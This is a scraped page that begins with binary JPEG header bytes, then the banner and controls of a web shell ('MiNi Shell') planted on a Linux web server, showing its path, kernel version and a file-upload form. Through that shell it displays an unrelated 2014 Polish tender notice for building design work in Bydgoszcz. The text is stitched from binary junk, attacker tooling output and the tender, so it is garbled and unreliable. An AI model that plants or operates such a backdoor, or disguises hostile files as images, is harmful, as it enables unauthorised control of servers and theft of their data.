JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140401/70183-N-2014.html

<p class="kh_header"><b>Bydgoszcz: 18/P/2014</b><br>
<b>Numer ogłoszenia: 70183 - 2014; data zamieszczenia: 01.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Domów Miejskich "ADM" Spółka z o.o. , ul. Śniadeckich 1, 85-011 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3481600, faks 052 3481607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 18/P/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej  dla 7  budynków  zarządzanych przez Administrację Domów Miejskich ADM Sp. z o.o. w Bydgoszczy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 72.12.50.00-5, 71.30.00.00-1, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga  wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  posiadania wiedzy i doświadczenia zostanie spełniony jeśli Wykonawca wykaże, iż w okresie  ostatnich 3 lat przed  dniem wszczęcia  postępowania  o udzielenie  zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizował należycie zamówienia odpowiadające swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia tj.  WYKONAŁ:
dla zadania nr 1 - co najmniej 1 (słownie: jeden) projekt budowlany dotyczący wykonania rozbiórki  obiektu budowlanego    
dla zadania nr 2 - co najmniej 1 (słownie: jeden) projekt budowlany dotyczący wzmocnienia ścian/ konstrukcji  budynku 
dla zadania nr 3 -  co najmniej 1 (słownie: jeden) projekt budowlany dotyczący budowy/przebudowy lub remontu budynku 
dla zadania nr 4 -  co najmniej 1 (słownie: jeden) projekt budowlany dotyczący budowy/przebudowy lub remontu budynku 
dla zadania nr 5, 6 i 7  - co najmniej 1 (słownie: jeden) projekt budowlany dotyczący zmiany sposobu użytkowania budynku lub jego części.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje minimum :
dla  ZADANIA 1, 5, 6, 7 
- osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej lub architektonicznej  -  zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. z 2013r., poz. 1409 ze zm.) lub odpowiadające im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących  przepisów prawa
dla  ZADANIA 2, 3, 4 
- osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej -  zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. z 2013r., poz. 1409 ze zm.) lub odpowiadające im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących  przepisów prawa</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>dla zadania nr 1 - co najmniej 1 (słownie: jeden) projekt budowlany dotyczący wykonania rozbiórki  obiektu budowlanego    
dla zadania nr 2 - co najmniej 1 (słownie: jeden) projekt budowlany dotyczący wzmocnienia ścian/ konstrukcji  budynku 
dla zadania nr 3 -  co najmniej 1 (słownie: jeden) projekt budowlany dotyczący budowy/przebudowy lub remontu budynku 
dla zadania nr 4 -  co najmniej 1 (słownie: jeden) projekt budowlany dotyczący budowy/przebudowy lub remontu budynku 
dla zadania nr 5, 6 i 7  - co najmniej 1 (słownie: jeden) projekt budowlany dotyczący zmiany sposobu użytkowania budynku lub jego części.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  w  przypadku jeżeli Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zasobach  innych  podmiotów zgodnie z art.26 ust.2b ustawy pzp  -  pisemne  zobowiązanie  innych podmiotów do oddania do dyspozycji zasobów niezbędnych do realizacji zamówienia, na okres korzystania    z nich przy wykonaniu zamówienia  (w  oryginale)
2.  w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo o którym mowa  w  pkt.7.8. ust.1)  niniejszej SIWZ   (w oryginale lub notarialnie poświadczonej za zgodność   z oryginałem kopii )
3. w przypadku składania oferty przez pełnomocnika Wykonawcy - pełnomocnictwo do reprezentowania wykonawcy przez Pełnomocnika  (w oryginale lub notarialnie poświadczonej za zgodność z oryginałem kopii )
4.  Podział ceny na składniki  ( dotyczy zadania nr 5, 6 i 7 ) - według wzoru określonego załącznikiem nr 10/1, 10/2, 10/3 do SIWZ.
5. Formularz oferty - według wzoru stanowiącego załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.adm.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Domów Miejskich ADM Sp. z o.o. 
Dział  Zamówień Publicznych  
85-005  Bydgoszcz  ul. Gdańska 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2014 godzina 11:00, miejsce: Administracja Domów Miejskich ADM Sp. z o.o. 
Dział  Zamówień Publicznych  
85-005  Bydgoszcz  ul. Gdańska 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 18/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr 1:  
- opracowanie projektu budowlanego na rozbiórkę budynku mieszkalnego i przyległej drewnianej werandy położonych na nieruchomości przy ul. Poznańskiej 25 w Bydgoszczy (działka  nr 32/1, obręb 96)
Zakres zamówienia obejmuje:
1) wykonanie projektu rozbiórki budynku wraz z fundamentami (wersja papierowa - 5 egzemplarzy, na
nośniku elektronicznym - płyta CD-R: 2 egzemplarze) zawierającego także :
-  szkic usytuowania obiektu budowlanego,
-  opis zakresu i sposobu prowadzenia robót rozbiórkowych,
-  opis sposobu zapewnienia bezpieczeństwa ludzi i mienia,
- pozwolenia, uzgodnienia lub opinie innych organów a także inne dokumenty wymagane przepisami szczegółowymi
2) opracowanie dokumentacji kosztorysowej zawierającej:
- przedmiar robót (wersja papierowa: 2 egz., na nośniku elektronicznym: płyta CD-R:                      2 egzemplarze)
-  kosztorys inwestorski (wersja papierowa - 2 egz., na nośniku elektronicznym - płyta CD-R:
2 egzemplarze)
3) opracowanie specyfikacji technicznej wykonania i odbioru robót (wersja papierowa - 3 egz., na nośniku
elektronicznym - płyta CD-R : 2 egzemplarze)
4) opracowanie inwentaryzacji ornitologicznej i chiropterologicznej budynku (wersja papierowa - 2 egz., na nośniku elektronicznym - płyta CD-R: 1 egzemplarz) i uwzględnienie w projekcie rozbiórki zaleceń i wytycznych z niej wynikających,
5) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii itp. dokumentów do uzyskania decyzji               w sprawie pozwolenia na rozbiórkę,
6) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na rozbiórkę. Wniosek należy złożyć do Wydziału Administracji Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na rozbiórkę dostępna jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Termin wykonania zamówienia:
-  termin opracowania dokumentacji projektowo - kosztorysowej i złożenia wniosku o wydanie decyzji pozwolenia na wykonanie robót   w ciągu :  40 dni  od daty  zawarcia umowy, 
- termin dostarczenia decyzji pozwolenia na wykonanie robót budowlanych i kompletu dokumentacji projektowo-kosztorysowej w ciągu 7 dni od daty wydania decyzji pozwolenia, nie później  jednak  niż w terminie  115  dni  od  daty  zawarcia umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 115.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 18/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  nr 2:
- opracowanie projektu budowlanego wzmocnienia ścian budynku mieszkalnego położonego przy
ul. Stawowej 8 w Bydgoszczy   zgodnie z ekspertyzą stanu technicznego budynku wykonaną przez
p. Jadwigę Lubawy - Superczyńską. 
Zakres zamówienia obejmuje:
1) wykonanie projektu budowlanego wzmocnienia ścian budynku  (wersja papierowa - 5 egzemplarzy, na
nośniku elektronicznym - płyta CD-R: 2 egzemplarze) zawierającego także :
-  inwentaryzację architektoniczną i konstrukcyjną budynku 
-  opis zakresu i sposobu prowadzenia robót 
- pozwolenia, uzgodnienia lub opinie innych organów a także inne dokumenty wymagane przepisami szczegółowymi (konieczne uwzględnienia w projekcie rozstawienia rusztowania na terenie prywatnych posesji i wystąpienie w imieniu Zamawiającego do właścicieli sąsiednich działek o zgodę na częściowe zajęcie terenu na czas realizacji robót budowlanych). 
2) opracowanie dokumentacji kosztorysowej zawierającej:
- przedmiar robót (wersja papierowa: 2 egz., na nośniku elektronicznym: płyta CD-R:                      2 egzemplarze)
-  kosztorys inwestorski (wersja papierowa - 2 egz., na nośniku elektronicznym - płyta CD-R:
2 egzemplarze)

3)  opracowanie specyfikacji technicznej wykonania i odbioru robót (wersja papierowa - 3 egz., na nośniku  elektronicznym - płyta CD-R : 2 egzemplarze)
4)  uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii itp. dokumentów koniecznych do uzyskania decyzji  w sprawie pozwolenia na wykonanie robót. 
5)   uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Termin wykonania zamówienia:
-  termin opracowania dokumentacji projektowo - kosztorysowej i złożenia wniosku o wydanie decyzji pozwolenia na wykonanie robót   w ciągu :  40 dni  od daty  zawarcia umowy, 
- termin dostarczenia decyzji pozwolenia na wykonanie robót budowlanych i kompletu dokumentacji projektowo-kosztorysowej w ciągu 7 dni od daty wydania decyzji pozwolenia, nie później  jednak  niż w terminie  115  dni  od  daty  zawarcia umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 115.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 18/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr 3:
- aktualizacja projektu budowlanego z 2010 roku opracowanego przez p. Andrzeja Banaś na remont 
stropu między-kondygnacyjnego (nad piwnicą) w budynku przy  ul. Dworcowej 62  w Bydgoszczy. 
Aktualizacja projektu winna zawierać : 
1) ocenę stanu technicznego  istniejącego stropu 
2) warianty remontu stropu wraz z opisem realizacji prac,
3) wytyczne dotyczące bezpieczeństwa i ochrony zdrowia, 
4) uzyskanie wymaganych uzgodnień, pozwoleń i decyzji 
5) opracowanie dokumentacji kosztorysowej zawierającej:
- przedmiar robót (wersja papierowa: 2 egz., na nośniku elektronicznym: płyta CD-R:                      2 egzemplarze)
-  kosztorys inwestorski (wersja papierowa - 2 egz., na nośniku elektronicznym - płyta CD-R:
2 egzemplarze)
6) opracowanie specyfikacji technicznej wykonania i odbioru robót (wersja papierowa - 3 egz., na nośniku  elektronicznym - płyta CD-R : 2 egzemplarze).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 18/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  nr 4:
- aktualizacja projektu budowlanego z 2010 roku opracowanego przez p. Andrzeja Banaś na remont 
płyt balkonowych  wraz z obudowami  w budynku przy  ul. Garbary 24  w Bydgoszczy. 
Aktualizacja projektu winna zawierać : 
1) ocenę stanu technicznego istniejących płyt balkonowych od strony podwórza oraz istniejących zabudów ( dwóch pierwotnych i dwóch wykonanych samowolnie przez lokatorów)
2) analizę obciążeń zabudowanych płyt balkonowych
3) uzgodnienie obranego wariantu remontu zabudowanych balkonów z Miejskim Konserwatorem Zabytków 
4) uzyskanie wymaganych uzgodnień, pozwoleń i decyzji 
5) opracowanie dokumentacji kosztorysowej zawierającej:
- przedmiar robót (wersja papierowa: 2 egz., na nośniku elektronicznym: płyta CD-R:                      2 egzemplarze)
-  kosztorys inwestorski (wersja papierowa - 2 egz., na nośniku elektronicznym - płyta CD-R:
2 egzemplarze)
6) opracowanie specyfikacji technicznej wykonania i odbioru robót (wersja papierowa - 3 egz., na nośniku  elektronicznym - płyta CD-R : 2 egzemplarze).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 18/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> * ZADANIE nr 5:   
-  opracowanie projektu budowlanego na przekwalifikowanie lokalu mieszkalnego nr 5 w budynku przy  ul. Lubelskiej 44 w Bydgoszczy na pomieszczenie gospodarcze wraz z uzyskaniem decyzji o warunkach zabudowy. 
Zakres  zamówienia  obejmuje : 
1. uzyskanie we własnym zakresie w ramach wynagrodzenia z oferty warunków, map geodezyjnych, opinii, w tym decyzji o warunkach zabudowy i zagospodarowania terenu,  oświadczeń od gestorów sieci gwarantujących możliwość korzystania z sieci lub zapewniających dostawy poszczególnych mediów i innych dokumentów niezbędnych do opracowania projektu budowlanego na zmianę sposobu użytkowania lokalu mieszkalnego nr 5 w budynku przy ul. Unii Lubelskiej 44  na cele gospodarcze. 
2. wykonanie projektu budowlanego na zmianę sposobu użytkowania lokalu mieszkalnego na cele gospodarcze (wersja papierowa - 5 egzemplarzy, na nośniku elektronicznym- płyta CD-R: 2 egzemplarze) zawierającego warunki BIOZ, wytyczne BHP i  p. poż. 
3.  opracowanie dokumentacji kosztorysowej zawierającej:
- przedmiar robót (wersja papierowa: 2 egz., na nośniku elektronicznym: płyta CD-R:                      2 egzemplarze)
-   kosztorys inwestorski (wersja papierowa - 2 egz., na nośniku elektronicznym - płyta CD-R:
2 egzemplarze)
4. opracowanie specyfikacji technicznej wykonania i odbioru robót (wersja papierowa - 3 egz., na nośniku  elektronicznym - płyta CD-R : 2 egzemplarze)
5. uzyskanie w imieniu Zamawiającego na podstawie udzielonego pełnomocnictwa, przyjęcia przez WAB przy UM Bydgoszcz zgłoszenia o rozpoczęciu robót objętego projektem bez uwag lub jeżeli dokumentacja będzie wymagała wydania decyzji pozwolenia na budowę - uzyskanie pozwolenia na wykonanie robót objętych projektem (decyzja), zgodnie z przepisami prawa budowlanego.
Termin Wykonania zamówienia:
- termin uzyskania decyzji o warunkach zabudowy i zagospodarowania terenu: 30 dni od daty zawarcia umowy
- termin opracowania dokumentacji projektowo-kosztorysowej na podstawie ww. decyzji i złożenia wniosku o wydanie decyzji pozwolenia na wykonanie robót  (w przypadku kiedy taka decyzja będzie wymagana prawem budowlanym)  lub zgłoszenia o rozpoczęciu robót :  21 dni  od dnia uprawomocnienia się decyzji o warunkach zabudowy i zagospodarowania terenu
-  termin dostarczenia decyzji pozwolenia na budowę: 70 dni  od dnia złożenia wniosku o wydanie decyzji pozwolenia na budowę do UM WAB Bydgoszcz  (w przypadku kiedy taka decyzja będzie wymagana prawem budowlanym)   lub 
-  termin dostarczenia kopii  przyjętego przez WAB UM Bydgoszcz zgłoszenia o zamiarze rozpoczęcia robót:  10 dni  od dnia zaakceptowania przez Zamawiającego dokumentacji projektowo-kosztorysowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 121.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> 18/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr 6:
-  opracowanie projektu budowlanego na przekwalifikowanie lokalu użytkowego (L301) znajdującego się w piwnicy w budynku przy  ul. Sierocej 4 w Bydgoszczy na pomieszczenie gospodarcze wraz z uzyskaniem zaświadczenia   o zgodności z miejscowym planem zagospodarowania przestrzennego.  
Zakres  zamówienia  obejmuje : 
1. uzyskanie we własnym zakresie w ramach wynagrodzenia z oferty warunków, map geodezyjnych, opinii, w tym zaświadczenia o zgodności z miejscowym planem zagospodarowania przestrzennego,  oświadczeń od gestorów sieci gwarantujących możliwość korzystania z sieci lub zapewniających dostawy poszczególnych mediów i innych dokumentów niezbędnych do opracowania projektu budowlanego na zmianę sposobu użytkowania lokalu użytkowego w budynku przy ul. Sierocej 4  na cele gospodarcze. 
2. wykonanie projektu budowlanego na zmianę sposobu użytkowania lokalu użytkowego na cele gospodarcze (wersja papierowa - 5 egzemplarzy, na nośniku elektronicznym- płyta CD-R: 2 egzemplarze) zawierającego warunki BIOZ, wytyczne BHP i  p. poż. 
